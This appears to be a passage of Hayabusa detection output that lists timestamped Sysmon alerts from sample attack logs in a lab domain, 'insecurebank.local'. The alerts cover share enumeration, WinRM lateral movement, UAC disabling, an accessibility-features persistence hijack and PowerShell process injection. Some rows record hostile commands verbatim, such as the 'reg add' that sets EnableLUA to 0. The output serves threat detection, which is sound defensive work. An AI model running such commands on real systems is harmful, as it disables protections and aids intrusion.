2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx
2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: 
C:\Windows\system32\WinrsHost.exe -Embedding | Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx 2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx 2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx 2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: 
SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx 2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,low,Disc,Suspicious Execution of Hostname,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_hostname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx 2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Exec,Remote PowerShell Session Host Process (WinRM),,../hayabusa-rules/sigma/process_creation/proc_creation_win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx 2019-05-16 22:10:13.760 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell CLM Setting Changed | DeleteValue: HKLM\System\CurrentControlSet\Control\SESSION MANAGER\Environment\__PSLockdownPolicy | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3580 | PGUID: DFAE8213-5B49-5CDD-0000-0010EE520500,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Powershell_CLM_Disabled_Sysmon_12.evtx 2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f | Process: C:\Windows\System32\reg.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x585e6 | PID: 3788 | PGUID: 
DFAE8213-70EB-5CDD-0000-0010F66D0A00 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | CreateKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 3788 | PGUID: DFAE8213-70EB-5CDD-0000-0010F66D0A00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-16 23:17:15.763 +09:00,DC1.insecurebank.local,13,medium,PrivEsc | Evas,Disable UAC Using Registry,,../hayabusa-rules/sigma/registry_event/win_re_disable_uac_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx 2019-05-17 01:08:30.516 +09:00,DC1.insecurebank.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: 
C:\Windows\system32\LogonUI.exe | PID: 1684 | PGUID: DFAE8213-8AFE-5CDD-0000-001035B90A00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 1720 | PGUID: DFAE8213-8B02-5CDD-0000-00109BCA0A00 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\osk.exe"" | LID: 0x3e7 | PID: 3764 | PGUID: DFAE8213-8B08-5CDD-0000-001011CE0A00 | Hash: SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Disc,Local Accounts 
Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx 2019-05-19 02:16:08.348 +09:00,IEWIN7,10,low,,Process Access,Src Process: 耙甯\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.255 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.333 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
